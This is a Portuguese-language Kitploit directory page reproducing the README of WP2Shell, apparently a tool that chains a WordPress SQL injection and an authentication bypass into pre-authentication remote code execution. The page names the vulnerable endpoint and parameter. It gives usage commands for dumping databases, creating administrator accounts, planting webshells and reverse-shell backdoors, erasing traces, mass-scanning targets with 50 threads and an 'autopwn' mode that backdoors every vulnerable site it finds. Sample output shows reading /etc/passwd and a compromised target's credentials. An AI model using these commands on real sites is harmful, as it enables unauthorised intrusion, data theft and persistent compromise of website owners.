Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WP2Shell — Framework modular de exploração pré-auth do WordPress que encadeia injeção de SQL e bypass de autenticação para fornecer execução remota de código, shells interativos, backdoors e varredura em massa de vulnerabilidades. | Kitploit
Ferramentas/GitHubGitHub/g0d150ne/wp2shell
Frameworks de Testes de PenetraçãoReconhecimentoScanners de VulnerabilidadesFrameworks de ExploraçãoMecanismos de PersistênciaExploraçãoExploração de Aplicações WebBypass de WAFFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHub
10há 29 diasAinda não revisado
g0d150ne/wp2shell

WP2Shell

Framework modular de exploração pré-auth do WordPress que encadeia injeção de SQL e bypass de autenticação para fornecer execução remota de código, shells interativos, backdoors e varredura em massa de vulnerabilidades.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

WP2Shell - Exploração de RCE Pré-Autenticação em WordPress

CVE-2026-63030 + CVE-2026-60137
Versão: 4.0.0
Autor: G0D150NE

📌 Visão Geral

O WP2Shell é uma ferramenta de exploração de cadeia completa para execução remota de código pré-autenticação no WordPress. Ele combina duas vulnerabilidades críticas:

  • CVE-2026-63030 - Injeção de SQL no endpoint Batch da API REST
  • CVE-2026-60137 - Bypass de autenticação via envenenamento de cache oEmbed

Esta ferramenta permite o comprometimento completo de instalações WordPress vulneráveis sem qualquer autenticação - da detecção ao RCE completo e persistência.

⚡ Recursos

  • 🔍 Verificação não destrutiva - Confirmação segura de vulnerabilidade
  • 📊 Extração multi-técnica - UNION, baseada em erro, SQLi cego
  • 🚀 Cadeia RCE completa - De SQLi à criação de conta de administrador
  • 🐚 Implantação de webshell - Backdoor oculto baseado em plugin
  • 🧹 Capacidade de limpeza - Remove todos os rastros
  • 📡 Varredura em massa - Scanner com threads para múltiplos alvos
  • 🤖 Modo autopwn - Descoberta de subdomínios + exploração automática
  • 🌐 Rotação de proxy - Suporte para proxies rotativos
  • 🕵️ Modo furtivo - Atrasos aleatórios e técnicas de bypass de WAF

🔧 Instalação

root@kitploit:~
# Clone repository
git clone https://github.com/g0d150ne/wp2shell.git
cd wp2shell

# No dependencies needed - uses Python 3.8+ standard library
chmod +x wp2shell.py

🎯 Uso

Estrutura de Comandos

root@kitploit:~
python3 wp2shell.py [COMMAND] [OPTIONS] [TARGET]

Comandos Disponíveis

ComandoDescrição
checkConfirmação não destrutiva de vulnerabilidade
readExtração de dados via injeção de SQL
exploitCadeia RCE completa pré-autenticação
shellImplantação de webshell com credenciais existentes
masscanVarredura em massa de múltiplos alvos
autopwnDescoberta automática → varredura → exploração

🚀 Exemplos

1. Verificação de Vulnerabilidade

root@kitploit:~
python3 wp2shell.py check https://target.com
root@kitploit:~
python3 wp2shell.py check https://target.com --confirm-timing --sleep 5

2. Extração de Dados

Fingerprint básico:

root@kitploit:~
python3 wp2shell.py read https://target.com

Extrair usuários:

root@kitploit:~
python3 wp2shell.py read https://target.com --preset users

Consulta personalizada:

root@kitploit:~
python3 wp2shell.py read https://target.com --query "SELECT @@version"

Gerar dump do banco de dados inteiro:

root@kitploit:~
python3 wp2shell.py read https://target.com --preset dumpall --max-length 4096

3. Exploração Completa

Exploração básica:

root@kitploit:~
python3 wp2shell.py exploit https://target.com

Exploração com shell interativo:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --interactive

Exploração com instalação de backdoor:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --backdoor --lhost 192.168.1.100 --lport 4444

Exploração com dump do banco de dados:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --dumpdb

Exploração com limpeza (remover rastros):

root@kitploit:~
python3 wp2shell.py exploit https://target.com --cleanup

4. Usando Credenciais de Administrador Existentes

root@kitploit:~
python3 wp2shell.py shell https://target.com --user admin --password secret123 --interactive
root@kitploit:~
python3 wp2shell.py shell https://target.com --user admin --password secret123 --command "whoami"

5. Varredura em Massa

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Scan with 50 threads
python3 wp2shell.py masscan --file targets.txt --threads 50 --output results.csv

6. Modo Autopwn (Automação Completa)

root@kitploit:~
python3 wp2shell.py autopwn --domain example.com --lhost 192.168.1.100

Isso irá:

  1. Descobrir subdomínios via crt.sh
  2. Identificar instalações WordPress
  3. Explorar todos os sites vulneráveis
  4. Instalar backdoors nos alvos bem-sucedidos

🎮 Shell Interativo

Após a exploração, você obtém um shell interativo completo:

root@kitploit:~
python3 wp2shell.py exploit https://target.com -i
root@kitploit:~
[*] Interactive shell — type 'exit' to quit
/var/www/html $ id
uid=33(www-data) gid=33(www-data)
/var/www/html $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
/var/www/html $ exit

🛡️ Referência de Opções

Opções Comuns

OpçãoDescrição
--timeoutTempo limite (timeout) HTTP em segundos (padrão: 30)
--proxiesLista de proxies separados por vírgula (ex.: http://127.0.0.1:8080)
--stealthAtiva o modo furtivo com atrasos aleatórios
-v, --verboseAtiva a saída de depuração
-q, --quietSuprime o banner e as mensagens informativas

Opções do Comando Read

OpçãoDescrição
--prefixPrefixo da tabela (padrão: wp_)
--auto-prefixDescobre automaticamente o prefixo da tabela
--max-lengthMáximo de caracteres por valor (padrão: 128)
--techniqueTécnica de extração: auto/union/error/blind
--presetPredefinição de dados: fingerprint/users/dumpall
--queryExpressão SQL arbitrária para extrair

Opções do Comando Exploit

OpçãoDescrição
--prefixPrefixo da tabela (padrão: wp_)
--no-discoverPular a descoberta automática, usar padrões
-i, --interactiveAbrir shell após a exploração
-c, --commandExecutar um único comando após a exploração
--backdoorInstalar backdoor de persistência
--lhostLHOST para reverse shell (padrão: 10.0.0.1)
--lportLPORT para reverse shell (padrão: 4444)
--dumpdbGerar dump do banco de dados após a exploração
--cleanupExcluir o usuário criado e o webshell ao sair

🔬 Detalhes Técnicos

Cadeia de Vulnerabilidades

  1. Injeção de SQL (CVE-2026-63030)

    • Ocorre no endpoint /wp-json/batch/v1
    • O parâmetro author_exclude é vulnerável a SQLi cego baseado em tempo
    • Permite extração via UNION e baseada em erro
  2. Bypass de Autenticação (CVE-2026-60137)

    • Envenenamento de cache oEmbed via parâmetro /_embed
    • Permite criar usuários administradores através de changeset do customizer
    • Aciona a cadeia de reentrada para criação de contas privilegiadas

Versões do WordPress Suportadas

VersãoStatus
6.9.0✅ Vulnerável
6.9.1✅ Vulnerável
6.9.2✅ Vulnerável
6.9.3✅ Vulnerável
6.9.4✅ Vulnerável
7.0.0✅ Vulnerável
7.0.1✅ Vulnerável
≥ 7.0.2❌ Corrigida

Técnicas de Extração

TécnicaVelocidadeTamanho dos DadosRequisitos
UNION⚡ Muito rápidaIlimitadoO alvo não deve filtrar UNION
Error🚀 Rápida~30 caracteres/reqO alvo deve expor mensagens de erro
Blind🐢 LentaIlimitadoOracle booleano disponível

📊 Exemplos de Saída

Exploração Bem-Sucedida

root@kitploit:~
░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░▒▓███████▓▒░ ░▒▓███████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓█▓▒░      ░▒▓█▓▒░        
                                                                                                                                                                                                                            
  CVE-2026-63030 + CVE-2026-60137
  WordPress Pre-Auth RCE  [v4.0.0]
  + G0D150NE

[1/7] Reconnaissance
  Target: https://target.com
  WordPress 6.9.3
[+] UNION extraction available (in-band, 1 request/value)

[2/7] Enumerating target
[+] Discovered table prefix: wp_

[3/7] Locating embed target
[+] Embed URL: https://target.com/2020/01/01/hello-world/

[4/7] Seeding oEmbed cache posts
[+] Seed payload delivered

[5/7] Extracting cache post IDs
[+] Cache IDs: [12345, 12346, 12347, 12348]

[6/7] Triggering escalation chain
[+] Administrator created via re-entry chain

[7/7] Deploying webshell
[+] Authenticated
[+] RCE confirmed
  uid: www-data

[+] ========================================================
[+]   TARGET COMPROMISED
[+]   Admin:  wp_service_a1b2 / G7hK9xQw2p$L!mN
[+]   Shell:  https://target.com/wp-content/plugins/cache_a1b2/cache_a1b2.php
[+] ========================================================

⚠️ Aviso Legal

Esta ferramenta é apenas para testes de segurança autorizados e fins educacionais. O uso contra sistemas sem permissão explícita é ilegal. Os autores não assumem responsabilidade por qualquer uso indevido.

📚 Referências

  • CVE-2026-63030
  • CVE-2026-60137
  • Aviso de Segurança do WordPress
  • Blog Técnico do WP2Shell

🤝 Contribuição

Encontrou um bug? Quer melhorar a ferramenta? Pull requests são bem-vindos!

  1. Faça um fork do repositório
  2. Crie seu branch de funcionalidade
  3. Faça commit das suas alterações
  4. Envie para o branch
  5. Abra um Pull Request

📄 Licença

Licença MIT - Consulte o arquivo LICENSE para obter detalhes.

Baixar ferramenta